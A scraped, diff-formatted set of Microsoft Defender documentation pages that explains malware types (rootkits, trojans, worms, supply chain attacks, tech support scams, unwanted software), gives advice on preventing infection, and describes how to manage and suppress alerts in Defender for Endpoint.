--- [Protect yourself from phishing](https://support.microsoft.com/help/4033787/windows-protect-yourself-from-phishing)-- [Phishing trends](phishing-trends.md)
security Prevent Malware Infection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/prevent-malware-infection.md
- Title: Prevent malware infection-
-description: Learn steps you can take to help prevent a malware or potentially unwanted software from infecting your computer.
-keywords: security, malware, prevention, infection, tips, Microsoft, MMPC, Microsoft Malware Protection Center, virus, trojan, worm, stop, prevent, full scan, infection, avoid malware, avoid trojan, avoid virus, infection, how, detection, security software, antivirus, updates, how malware works, how virus works, firewall, turn on, user privileges, limit, prevention, WDSI, MMPC, Microsoft Malware Protection Center
------- m365-security-- tier2- Previously updated : 08/18/2023--
-# Prevent malware infection
-
-Attackers are always looking for new ways to infect computers. Follow the tips below to stay protected and minimize threats to your data and accounts.
-
-## Keep software up to date
-
-[Exploits](exploits-malware.md) typically use vulnerabilities in software. It's important to keep your software, apps, and operating systems up to date.
-
-To keep Microsoft software up to date, ensure that [automatic Microsoft Updates](https://support.microsoft.com/help/12373/windows-update-faq) are enabled. Also, upgrade to the latest version of Windows to benefit from the latest built-in security enhancements.
-
-## Be wary of links and attachments
-
-Email, SMS messages, Microsoft Teams chat, and other messaging tools are a few of the most common ways attackers can infect devices. Attachments or links in messages can open malware directly or can stealthily trigger a download.
--- Use an email service that provides protection against malicious attachments, links, and abusive senders. [Microsoft Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) has built-in anti-malware, link protection, and spam filtering. Microsoft Outlook contains additional security configurations and settings you can enable. See [Advanced Outlook.com security for Microsoft 365 subscribers](https://support.microsoft.com/office/advanced-outlook-com-security-for-microsoft-365-subscribers-882d2243-eab9-4545-a58a-b36fee4a46e2)--- Some attackers try to get you to share information about your login information, passwords, and more. Be aware of some of the common tactics attackers use to try to trick you. For more information, see [phishing](phishing.md).-
-## Watch out for malicious or compromised websites
-
-When you visit malicious or compromised sites, your device can get infected with malware automatically or you can get tricked into downloading and installing malware. See [exploits and exploit kits](exploits-malware.md) as an example of how some of these sites can automatically install malware to visiting computers.
-
-To identify potentially harmful websites, keep the following in mind:
--- The initial part (domain) of a website address should represent the company that owns the site you're visiting. Check the domain for misspellings. For example, malicious sites commonly use domain names that swap the letter O with a zero (0) or the letters L and I with a one (1). If `example.com` is spelled `examp1e.com`, the site you're visiting is suspect.--- Sites that aggressively open popups and display misleading buttons often trick users into accepting content through constant popups or mislabeled buttons.-
-To block malicious websites, use a modern web browser like [Microsoft Edge](https://www.microsoft.com/windows/microsoft-edge?ocid=cx-wdsi-articles) that identifies phishing and malware websites and checks downloads for malware.
-
-If you encounter an unsafe site, click **More [...] > Send feedback** on Microsoft Edge. You can also [report unsafe sites directly to Microsoft](https://www.microsoft.com/wdsi/support/report-unsafe-site).
-
-### Pirated material on compromised websites
-
-Using pirated content isn't only illegal, it can also expose your device to malware. Sites that offer pirated software and media are also often used to distribute malware when the site is visited. Sometimes pirated software is bundled with malware and other unwanted software when downloaded, including intrusive browser plugins and adware.
-
-Users don't openly discuss visits to these sites, so any untoward experience are more likely to stay unreported.
-
-To stay safe, download movies, music, and apps from official publisher websites or stores.
-
-## Don't attach unfamiliar removable drives
-
-Some types of malware spread by copying themselves to USB flash drives or other removable drives. There are malicious individuals that intentionally prepare and distribute infected drives by leaving them in public places for unsuspecting individuals.
-
-Only use removable drives that you're familiar with or that come from a trusted source. If a drive has been used in publicly accessible devices, like computers in a café or a library, make sure you have antimalware running on your computer before you use the drive. Avoid opening unfamiliar files you find on suspect drives, including Office and PDF documents and executable files.
-
-## Use a non-administrator account
-
-At the time they're launched, whether inadvertently by a user or automatically, most malware run under the same privileges as the active user. This means that by limiting account privileges, you can prevent malware from making consequential changes any devices.
-
-By default, Windows uses [User Account Control (UAC)](/windows/security/identity-protection/user-account-control/user-account-control-overview) to provide automatic, granular control of privilegesΓÇöit temporarily restricts privileges and prompts the active user every time an application attempts to make potentially consequential changes to the system. Although UAC helps limit the privileges of admin users, users can override this restriction when prompted. As a result, it's quite easy for an admin user to inadvertently allow malware to run.
-
-To help ensure that everyday activities don't result in malware infection and other potentially catastrophic changes, it's recommended that you use a non-administrator account for regular use. By using a non-administrator account, you can prevent installation of unauthorized apps and prevent inadvertent changes to system settings. Avoid browsing the web or checking email using an account with administrator privileges.
-
-Whenever necessary, log in as an administrator to install apps or make configuration changes that require admin privileges.
-
-[Read about creating user accounts and giving administrator privileges](https://support.microsoft.com/help/4026923/windows-create-a-local-user-or-administrator-account-in-windows-10)
-
-## Other safety tips
-
-To further ensure that data is protected from malware and other threats:
--- Backup files. Follow the 3-2-1 rule: make **3 copies**, store in at least **2 locations**, with at least **1 offline copy**. Use [OneDrive](https://onedrive.live.com/about) for reliable cloud-based copies that allow access to files from multiple devices and helps recover damaged or lost files, including files locked by ransomware.--- Be wary when connecting to public Wi-Fi hotspots, particularly those that don't require authentication.--- Use [strong passwords](https://support.microsoft.com/help/12410/microsoft-account-help-protect-account) and enable multi-factor authentication.--- Don't use untrusted devices to log on to email, social media, and corporate accounts.--- Avoid downloading or running older apps. Some of these apps might have vulnerabilities. Also, older file formats for Office 2003 (.doc, .pps, and .xls) allow macros or run. This could be a security risk.-
-## Software solutions
-
-Microsoft provides comprehensive security capabilities that help protect against threats. We recommend:
--- [Automatic Microsoft updates](https://support.microsoft.com/help/12373/windows-update-faq) keeps software up to date to get the latest protections.--- [Microsoft Edge](/microsoft-edge/deploy/index) browser protects against threats such as ransomware by preventing exploit kits from running. By using [Windows Defender SmartScreen](/microsoft-edge/deploy/index), Microsoft Edge blocks access to malicious websites.--- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows) is built into Windows and helps provide real-time protection against viruses, malware, and other attacks.--- [Microsoft Safety Scanner](../safety-scanner-download.md) helps remove malicious software from computers. NOTE: This tool doesn't replace your antimalware product.
-
-- [Microsoft Defender](https://support.microsoft.com/topic/getting-started-with-microsoft-defender-9df0cb0f-4866-4433-9cbc-f83e5cf77693) is the simple way to protect your digital life and all of your devices. It's included as part of your Microsoft 365 Family, or Personal, subscription at no extra cost.-
-### Use Zero Trust
-Businesses should move to a [Zero Trust security strategy](/security/zero-trust/zero-trust-overview). Zero Trust isn't a product or a service, but an approach in designing and implementing the following set of security principles:
--- Verify explicitly-- Use least privilege access-- Assume breach -
-### Software solutions for business
--- [Microsoft Defender for Business](/microsoft-365/security/defender-business/mdb-overview) is a security solution designed especially for the small- and medium-sized business (up to 300 employees). With this endpoint security solution, your company's devices are better protected from ransomware, malware, phishing, and other threats.
-
-- [Microsoft Exchange Online Protection (EOP)](https://products.office.com/exchange/exchange-email-security-spam-protection) offers enterprise-class reliability and protection against spam and malware, while maintaining access to email during and after emergencies.--- [Microsoft Defender for Office 365](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description) includes machine learning capabilities that block dangerous emails, including millions of emails carrying ransomware downloaders.--- [OneDrive for Business](https://support.office.com/article/restore-a-previous-version-of-a-file-in-onedrive-159cad6d-d76e-4981-88ef-de6e96c93893?ui=en-US&rs=en-US&ad=US) can back up files, which you would then use to restore files in the event of an infection.--- [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint) provides comprehensive endpoint protection, detection, and response capabilities to help prevent ransomware. In the event of a breach, Microsoft Defender for Endpoint alerts security operations teams about suspicious activities and automatically attempts to resolve the problem.--- [Windows Hello for Business](/windows/security/identity-protection/hello-for-business/hello-identity-verification) replaces passwords with strong two-factor authentication on your devices. This authentication consists of a new type of user credential that is tied to a device and uses a biometric or PIN. It lets user authenticate to an Active Directory or Azure Active Directory account.-
-## What to do with a malware infection
-
-Microsoft Defender for Endpoint antivirus capabilities help reduce the chances of infection and automatically remove threats that it detects.
-
-In case threat removal is unsuccessful, read about [troubleshooting malware detection and removal problems](https://support.microsoft.com/help/4466982/windows-10-troubleshoot-problems-with-detecting-and-removing-malware).
security Rootkits Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/rootkits-malware.md
- Title: Rootkits-
-description: Rootkits may be used by malware authors to hide malicious code on your computer and make malware or potentially unwanted software harder to remove.
-keywords: security, malware, rootkit, hide, protection, hiding, WDSI, MMPC, Microsoft Malware Protection Center, rootkits, Sirefef, Rustock, Sinowal, Cutwail, malware, virus
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Rootkits
-
-Malware authors use rootkits to hide malware on your device, allowing malware to persist as long as possible. A successful rootkit can potentially remain in place for years if it's undetected. During this time, it steals information and resources.
-
-## How rootkits work
-
-Rootkits intercept and change standard operating system processes. After a rootkit infects a device, you can't trust any information that device reports about itself.
-
-If asked a device to list all of the programs that are running, the rootkit might stealthily remove any programs it doesn't want you to know about. Rootkits are all about hiding things. They want to hide both themselves and their malicious activity on a device.
-
-Many modern malware families use rootkits to try to avoid detection and removal, including:
-
-* [Alureon](https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fAlureon)
-
-* [Cutwail](https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fCutwail)
-
-* [Datrahere](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/Detrahere) (Zacinlo)
-
-* [Rustock](https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2fRustock)
-
-* [Sinowal](https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fSinowal)
-
-* [Sirefef](https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fSirefef)
-
-## How to protect against rootkits
-
-Like any other type of malware, the best way to avoid rootkits is to prevent it from being installed in the first place.
-
-* Apply the latest updates to operating systems and apps.
-
-* Educate your employees so they can be wary of suspicious websites and emails.
-
-* Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your data, on two different storage types, and at least one backup offsite.
-
-For more general tips, see [prevent malware infection](prevent-malware-infection.md).
-
-### What if I think I have a rootkit on my device?
-
-Microsoft security software includes many technologies designed specifically to remove rootkits. If you think you have a rootkit, you might need an extra tool that helps you boot to a known trusted environment.
-
-[Microsoft Defender Offline](https://support.microsoft.com/help/17466/microsoft-defender-offline-help-protect-my-pc) can be launched from the Windows Security app and has the latest antimalware updates from Microsoft. It's designed to be used on devices that aren't working correctly because of a possible malware infection.
-
-[System Guard](https://cloudblogs.microsoft.com/microsoftsecure/2017/10/23/hardening-the-system-and-maintaining-integrity-with-windows-defender-system-guard/) in Windows 10 protects against rootkits and threats that affect system integrity.
-
-### What if I can't remove a rootkit?
-
-If the problem persists, we strongly recommend reinstalling the operating system and security software. Then restore your data from a backup.
security Supply Chain Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/supply-chain-malware.md
- Title: Supply chain attacks-
-description: Learn about how supply chain attacks work, deliver malware do your devices, and what you can do to protect yourself
-keywords: security, malware, protection, supply chain, hide, distribute, trust, compromised
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Supply chain attacks
-
-Supply chain attacks are an emerging threats that target software developers and suppliers. The goal is to access source codes, build processes, or update mechanisms by infecting legitimate apps to distribute malware.
-
-## How supply chain attacks work
--
-Attackers hunt for unsecure network protocols, unprotected server infrastructures, and unsafe coding practices. They break in, change source codes, and hide malware in build and update processes.
-
-Because software is built and released by trusted vendors, these apps and updates are signed and certified. In software supply chain attacks, vendors are likely unaware that their apps or updates are infected with malicious code when they're released to the public. The malicious code then runs with the same trust and permissions as the app.
-
-The number of potential victims is significant, given the popularity of some apps. A case occurred where a free file compression app was poisoned and deployed to customers in a country/region where it was the top utility app.
-
-### Types of supply chain attacks
-
-* Compromised software building tools or updated infrastructure
-
-* Stolen code-sign certificates or signed malicious apps using the identity of dev company
-
-* Compromised specialized code shipped into hardware or firmware components
-
-* Pre-installed malware on devices (cameras, USB, phones, etc.)
-
-To learn more about supply chain attacks, read this blog post called [attack inception: compromised supply chain within a supply chain poses new risks](https://www.microsoft.com/security/blog/2018/07/26/attack-inception-compromised-supply-chain-within-a-supply-chain-poses-new-risks/).
-
-## How to protect against supply chain attacks
-
-* Deploy strong code integrity policies to allow only authorized apps to run.
-
-* Use endpoint detection and response solutions that can automatically detect and remediate suspicious activities.
-
-### For software vendors and developers
-
-* Maintain a highly secure build and update infrastructure.
- * Immediately apply security patches for OS and software.
- * Implement mandatory integrity controls to ensure only trusted tools run.
- * Require multi-factor authentication for admins.
-
-* Build secure software updaters as part of the software development lifecycle.
- * Require SSL for update channels and implement certificate pinning.
- * Sign everything, including configuration files, scripts, XML files, and packages.
- * Check for digital signatures, and don't let the software updater accept generic input and commands.
-
-* Develop an incident response process for supply chain attacks.
- * Disclose supply chain incidents and notify customers with accurate and timely information
-
-For more general tips on protecting your systems and devices, see [prevent malware infection](prevent-malware-infection.md).
security Support Scams https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/support-scams.md
- Title: Tech Support Scams-
-description: Microsoft security software can protect you from tech support scams that claims to scan for malware or viruses and then shows you fake detections and warnings.
-keywords: security, malware, tech support, scam, protection, trick, spoof, fake, error messages, report, rogue security software, fake, antivirus, fake software, rogue, threats, fee, removal fee, upgrade, pay for removal, install full version, trial, lots of threats, scanner, scan, clean, computer, security, program, XP home security, fake microsoft, activate, activate scan, activate antivirus, warnings, pop-ups, security warnings, security pop-ups tech support scams, fake Microsoft error notification, fake virus alert, fake product expiration, fake Windows activation, scam web pages, scam phone numbers, telephone numbers, MMPC, WDSI, Microsoft Malware Protection Center, tech support scam numbers
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Tech support scams
-
-Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into paying for unnecessary technical support services. These services supposedly fix contrived device, platform, or software problems.
-
-## How tech support scams work
-
-Scammers might call you directly on your phone and pretend to be representatives of a software company. They might even spoof the caller ID so that it displays a legitimate support phone number from a trusted company. They can then ask you to install applications that give them remote access to your device. If the attackers use remote access, these experienced actors can misrepresent normal system output as signs of problems.
-
-Scammers might also initiate contact by displaying fake error messages on websites you visit, displaying support numbers and enticing you to call. They can also put your browser on full screen and display pop-up messages that won't go away, essentially locking your browser. These fake error messages aim to trick you into calling an indicated technical support hotline. Microsoft error and warning messages never include phone numbers.
-
-When you engage with the scammers, they can offer fake solutions for your "problems" and ask for payment in the form of a one-time fee or subscription to a purported support service.
-
-**For more information, view [known tech support scam numbers and popular web scams](https://support.microsoft.com/help/4013405/windows-protect-from-tech-support-scams).**
-
-## How to protect against tech support scams
-
-Share and implement the general tips on how to [prevent malware infection](prevent-malware-infection.md).
-
-It's also important to keep the following in mind:
--- Microsoft doesn't send unsolicited email messages or make unsolicited phone calls to request personal or financial information, or to fix your computer.-- Any communication with Microsoft has to be initiated by you.-- Don't call the number in the pop-ups. Microsoft's error and warning messages never include a phone number.-- Download software only from official vendor websites or the Microsoft Store. Be wary of downloading software from third-party sites, as some of them might have been modified without the author's knowledge to bundle support scam malware and other threats.-- Use [Microsoft Edge](https://www.microsoft.com/windows/microsoft-edge) when browsing the internet. It blocks known support scam sites using Windows Defender SmartScreen (which is also used by Internet Explorer). Furthermore, Microsoft Edge can stop pop-up dialogue loops used by these sites.-- Enable [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-in-windows-10) in Windows 10. It detects and removes known support scam malware.-
-## What to do if information has been given to a tech support person
--- Uninstall applications that scammers asked to be install. Consider resetting the device to a factory state. -- Run a full scan with Microsoft Defender Antivirus to remove any malware. Apply all security updates as soon as they're available.-- Change passwords.-- Monitor anomalous sign in activity. Use Windows Firewall to block traffic to services that you wouldn't normally access.-- Contact your bank or other financial institutions if you paid them. -
-### Reporting tech support scams
-
-Help Microsoft stop scammers, whether they claim to be from Microsoft or from another tech company, by reporting tech support scams:
-
-<b>www.microsoft.com/reportascam</b>
-
-You can also report any **unsafe website** that you suspect is a phishing website or contains malicious content directly to Microsoft by filling out a [Report an unsafe site form](https://www.microsoft.com/wdsi/support/report-unsafe-site) or using built in web browser functionality.
security Trojans Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/trojans-malware.md
- Title: Trojan malware-
-description: Trojans are a type of threat that can infect your device. This article describes how trojans work and how to remove them.
-keywords: security, malware, protection, trojan, download, file, infection, trojans, virus, protection, cleanup, removal, antimalware, antivirus, WDSI, MMPC, Microsoft Malware Protection Center, malware types
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Trojans
-
-Trojans are a common type of malware, which, unlike viruses, can't spread on their own. This means they either have to be downloaded manually or another malware needs to download and install them.
-
-Trojans often use the same file names as real and legitimate apps. It's easy to accidentally download a trojan thinking that it's a legitimate app.
-
-## How trojans work
-
-Trojans can come in many different varieties, but generally they do the following tasks:
--- Download and install other malware, such as viruses or [worms](worms-malware.md).--- Use the infected device for select fraud.--- Record keystrokes and websites visited.--- Send information about the infected device to a malicious hacker including passwords, sign in details for websites, and browsing history.--- Give a malicious hacker control over the infected device.-
-## How to protect against trojans
-
-Use the following free Microsoft software to detect and remove it:
--- [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-in-windows-10) for Windows 10 and Windows 8.1, or [Microsoft Security Essentials](https://www.microsoft.com/download/details.aspx?id=5201) for previous versions of Windows.--- [Microsoft Safety Scanner](../safety-scanner-download.md)-
-For more general tips, see [prevent malware infection](prevent-malware-infection.md).
security Understanding Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/understanding-malware.md
- Title: Understanding malware & other threats-
-description: Learn about the most prevalent viruses, malware, and other threats. Understand how they infect systems, how they behave, and how to prevent and remove them.
-keywords: security, malware, virus, malware, threat, analysis, research, encyclopedia, dictionary, glossary, ransomware, support scams, unwanted software, computer infection, virus infection, descriptions, remediation, latest threats, mmpc, microsoft malware protection center, wdsi
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Understanding malware & other threats
-
-Malware is a term used to describe malicious applications and code that can cause damage and disrupt normal use of devices. Malware can allow unauthorized access, use system resources, steal passwords, lock you out of your computer and ask for ransom, and more.
-
-Cybercriminals that distribute malware are often motivated by money and will use infected computers to launch attacks, obtain banking credentials, collect information that can be sold, sell access to computing resources, or extort payment from victims.
-
-As criminals become more sophisticated with their attacks, Microsoft is here to help. Windows 10 is the most secure version of Windows yet and includes many features to help protect you whether you're at home, at work, or on the go. With [Microsoft Defender for Endpoint](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp), businesses can stay protected with next-generation protection and other security capabilities.
-
-For good general tips, check out the [prevent malware infection](prevent-malware-infection.md) topic.
-
-There are many types of malware, including:
--- [Coin miners](coinminer-malware.md)-- [Exploits and exploit kits](exploits-malware.md)-- [Macro malware](macro-malware.md)-- [Phishing](phishing.md)-- [Ransomware](/security/compass/human-operated-ransomware)-- [Rootkits](rootkits-malware.md)-- [Supply chain attacks](supply-chain-malware.md)-- [Tech support scams](support-scams.md)-- [Trojans](trojans-malware.md)-- [Unwanted software](unwanted-software.md)-- [Worms](worms-malware.md)-
-## Additional resources and information
--- Keep up with the latest malware news and research. Check out our [Microsoft security blogs](https://www.microsoft.com/security/blog/product/windows/) and follow us on [Twitter](https://twitter.com/wdsecurity) for the latest news, discoveries, and protections.--- Learn more about [Windows security](../../index.yml).--- Learn how to [deploy threat protection capabilities across Microsoft 365 E5](/microsoft-365/solutions/deploy-threat-protection). -
security Unwanted Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/unwanted-software.md
- Title: Unwanted software-
-description: Learn about how unwanted software changes your default settings without your consent and what you can do to protect yourself.
-keywords: security, malware, protection, unwanted, software, alter, infect, unwanted software, software bundlers, browser modifiers, privacy, security, computing experience, prevent infection, solution, WDSI, MMPC, Microsoft Malware Protection Center, virus research threats, research malware, pc protection, computer infection, virus infection, descriptions, remediation, latest threats
------- m365-security-- tier2- Previously updated : 03/18/2022--
-# Unwanted software
-
-Unwanted software are programs that alter the Windows experience without your consent or control. This can take the form of modified browsing experience, lack of control over downloads and installation, misleading messages, or unauthorized changes to Windows settings.
-
-## How unwanted software works
-
-Unwanted software can be introduced when a user searches for and downloads applications from the internet. Some applications are software bundlers, which means that they're packed with other applications. As a result, other programs can be inadvertently installed when the original application is downloaded.
-
-Here are some indications of unwanted software:
--- There are programs that you didn't install and that may be difficult to uninstall--- Browser features or settings have changed, and you can't view or modify them--- There are excessive messages about your device's health or about files and programs--- There are ads that can't be easily closed-
-Some indicators are harder to recognize because they're less disruptive, but are still unwanted. For example, unwanted software can modify web pages to display specific ads, monitor browsing activities, or remove control of the browser.
-
-## How to protect against unwanted software
-
-To prevent unwanted software infection, download software only from official websites, or from the Microsoft Store. Be wary of downloading software from third-party sites.
-
-Use [Microsoft Edge](/microsoft-edge/deploy/index) when browsing the internet. Microsoft Edge includes additional protections that effectively block browser modifiers that can change your browser settings. Microsoft Edge also blocks known websites hosting unwanted software using [Windows Defender SmartScreen](/microsoft-edge/deploy/index) (also used by Internet Explorer).
-
-Enable [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-in-windows-10) in Windows 10. It provides real-time protection against threats and detects and removes known unwanted software.
-
-Download [Microsoft Security Essentials](https://www.microsoft.com/download/details.aspx?id=5201) for real-time protection in Windows 7 or Windows Vista.
-
-For more general tips, see [prevent malware infection](prevent-malware-infection.md).
-
-### What should I do if my device is infected?
-
-If you suspect that you have unwanted software, you can [submit files for analysis](https://www.microsoft.com/wdsi/filesubmission).
-
-Some unwanted software adds uninstallation entries, which means that you can **remove them using Settings**.
-1. Select the Start button
-2. Go to **Settings > Apps > Apps & features**.
-3. Select the app you want to uninstall, then select **Uninstall**.
-
-If you only recently noticed symptoms of unwanted software infection, consider sorting the apps by install date, and then uninstall the most recent apps that you didn't install.
-
-You may also need to **remove browser add-ons** in your browsers, such as Internet Explorer, Firefox, or Chrome.
-
-In case threat removal is unsuccessful, read about [troubleshooting malware detection and removal problems](https://support.microsoft.com/help/4466982/windows-10-troubleshoot-problems-with-detecting-and-removing-malware).
security Worms Malware https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/malware/worms-malware.md
- Title: Worms-
-description: Learn about how worms replicate and spread to other computers or networks. Read about the most popular worms and steps you can take to stop them.
-keywords: security, malware, protection, worm, vulnerabilities, infect, steal, Jenxcus, Gamarue, Bondat, WannaCrypt, WDSI, MMPC, Microsoft Malware Protection Center, worms, malware types, threat propagation, mass-mailing, IP scanning
------- m365-security-- tier2- Previously updated : 02/29/2024--
-# Worms
-
-A worm is a type of malware that can copy itself and often spreads through a network by exploiting security vulnerabilities. It can spread through email attachments, text messages, file-sharing programs, social networking sites, network shares, removable drives, and software vulnerabilities.
-
-## How worms work
-
-Worms represent a large category of malware. Different worms use different methods to infect devices. Depending on the variant, they can steal sensitive information, change security settings, send information to malicious hackers, stop users from accessing files, and other malicious activities.
-
-Jenxcus (also known as Dunihi), Gamarue (also known as Androm), and Bondat have consistently remained at the top of the list of malware that infects users running Microsoft software. Although these worms share some commonalities, it's interesting to note that they also have distinct characteristics.
-
-* **Jenxcus** has capabilities of not only infecting removable drives but can also act as a backdoor that connects back to its server. This threat typically gets into a device from a drive-by download attack, meaning it's installed when users just visit a compromised web page.
-
-* **Gamarue** typically arrives through spam campaigns, exploits, downloaders, social networking sites, and removable drives. When Gamarue infects a device, it becomes a distribution channel for other malware. We've seen it distribute other malware such as info stealers, spammers, clickers, downloaders, and rogues.
-
-* **Bondat** typically arrives through fictitious Nullsoft Scriptable Install System (NSIS), Java installers, and removable drives. When Bondat infects a system, it gathers information about the machine such as device name, Globally Unique Identifier (GUID), and OS build. It then sends that information to a remote server.
-
-Both Bondat and Gamarue have clever ways of obscuring themselves to evade detection. By hiding what they're doing, they try to avoid detection by security software.
-
-* [**WannaCrypt**](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom%3AWin32%2FWannaCrypt) also deserves a mention here. Unlike older worms that often spread just because they could, modern worms often spread to drop a payload (like ransomware).
-
-This image shows how a worm can quickly spread through a shared USB drive.
-
-![Worm example.](../../../media/security-intelligence-images/worm-usb-flight.png)
-
-### *Figure worm spreading from a shared USB drive*
-
-## How to protect against worms
-
-Enable [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-in-windows-10) in Windows 10. It provides real-time protection against threats and detects and removes known unwanted software.
-
-Download [Microsoft Security Essentials](https://www.microsoft.com/download/details.aspx?id=5201) for real-time protection in Windows 7 or Windows Vista.
-
-In case threat removal is unsuccessful, read about [troubleshooting malware detection and removal problems](https://www.microsoft.com/wdsi/help/troubleshooting-infection).
-
-For more general tips, see [prevent malware infection](/microsoft-365/security/defender-endpoint/malware/prevent-malware-infection).
security Manage Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-alerts.md
- Title: Manage Microsoft Defender for Endpoint alerts
-description: Change the status of alerts, create suppression rules to hide alerts, submit comments, and review change history for individual alerts with the Manage Alert menu.
------- m365-security-- tier2-- mde-edr-- Previously updated : 12/18/2020--
-# Manage Microsoft Defender for Endpoint alerts
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-managealerts-abovefoldlink)
-
-Defender for Endpoint notifies you of possible malicious events, attributes, and contextual information through alerts. A summary of new alerts is displayed and you can access all alerts in the **Alerts queue**.
-
-You can manage alerts by selecting an alert in the **Alerts queue**, or the **Alerts** tab of the Device page for an individual device.
-
-Selecting an alert in either of those places brings up the **Alert management pane**.
--
-Watch this video to learn how to use the new Microsoft Defender for Endpoint alert page.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4yiO5]
-
-## Link to another incident
-
-You can create a new incident from the alert or link to an existing incident.
-
-## Assign alerts
-
-If an alert is not yet assigned, you can select **Assign to me** to assign the alert to yourself.
-
-## Suppress alerts
-
-There might be scenarios where you need to suppress alerts from appearing in Microsoft Defender XDR. Defender for Endpoint lets you create suppression rules for specific alerts that are known to be innocuous such as known tools or processes in your organization.
-
-Suppression rules can be created from an existing alert. They can be disabled and reenabled if needed.
-
-When a suppression rule is created, it will take effect from the point when the rule is created. The rule will not affect existing alerts already in the queue, prior to the rule creation. The rule will only be applied on alerts that satisfy the conditions set after the rule is created.
-
-There are two contexts for a suppression rule that you can choose from:
--- **Suppress alert on this device**-- **Suppress alert in my organization**-
-The context of the rule lets you tailor what gets surfaced into the portal and ensure that only real security alerts are surfaced into the portal.
-
-You can use the examples in the following table to help you choose the context for a suppression rule:
-
-|Context|Definition|Example scenarios|
-||||
-|**Suppress alert on this device**|Alerts with the same alert title and on that specific device only will be suppressed. <p> All other alerts on that device will not be suppressed.|<ul><li>A security researcher is investigating a malicious script that has been used to attack other devices in your organization.</li><li>A developer regularly creates PowerShell scripts for their team.</li></ul>|
-|**Suppress alert in my organization**|Alerts with the same alert title on any device will be suppressed.|<ul><li>A benign administrative tool is used by everyone in your organization.</li></ul>|
-
-### Suppress an alert and create a new suppression rule
-
-Create custom rules to control when alerts are suppressed, or resolved. You can control the context for when an alert is suppressed by specifying the alert title, Indicator of compromise, and the conditions. After specifying the context, you'll be able to configure the action and scope on the alert.
-
-1. Select the alert you'd like to suppress. This brings up the **Alert management** pane.
-
-2. Select **Create a suppression rule**.
-
- You can create a suppression condition using these attributes. An AND operator is applied between each condition, so suppression occurs only if all conditions are met.
-
- - File SHA1
- - File name - wildcard supported
- - Folder path - wildcard supported
- - IP address
- - URL - wildcard supported
- - Command line - wildcard supported
-
-3. Select the **Triggering IOC**.
-
-4. Specify the action and scope on the alert.
-
- You can automatically resolve an alert or hide it from the portal. Alerts that are automatically resolved will appear in the resolved section of the alerts queue, alert page, and device timeline and will appear as resolved across Defender for Endpoint APIs.
-
- Alerts that are marked as hidden will be suppressed from the entire system, both on the device's associated alerts and from the dashboard and will not be streamed across Defender for Endpoint APIs.
-
-5. Enter a rule name and a comment.
-
-6. Click **Save**.
-
-#### View the list of suppression rules
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Rules** \> **Alert suppression**.
-
-2. The list of suppression rules shows all the rules that users in your organization have created.
-
-For more information on managing suppression rules, see [Manage suppression rules](manage-suppression-rules.md)
-
-## Change the status of an alert
-
-You can categorize alerts (as **New**, **In Progress**, or **Resolved**) by changing their status as your investigation progresses. This helps you organize and manage how your team can respond to alerts.
-
-For example, a team leader can review all **New** alerts, and decide to assign them to the **In Progress** queue for further analysis.
-
-Alternatively, the team leader might assign the alert to the **Resolved** queue if they know the alert is benign, coming from a device that is irrelevant (such as one belonging to a security administrator), or is being dealt with through an earlier alert.
-
-## Alert classification
-
-You can choose not to set a classification, or specify whether an alert is a true alert or a false alert. It's important to provide the classification of true positive/false positive. This classification is used to monitor alert quality, and make alerts more accurate. The "determination" field defines additional fidelity for a "true positive" classification.
-
-The steps to classify alerts are included in this video:
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4LHJq]
-
-## Add comments and view the history of an alert
-
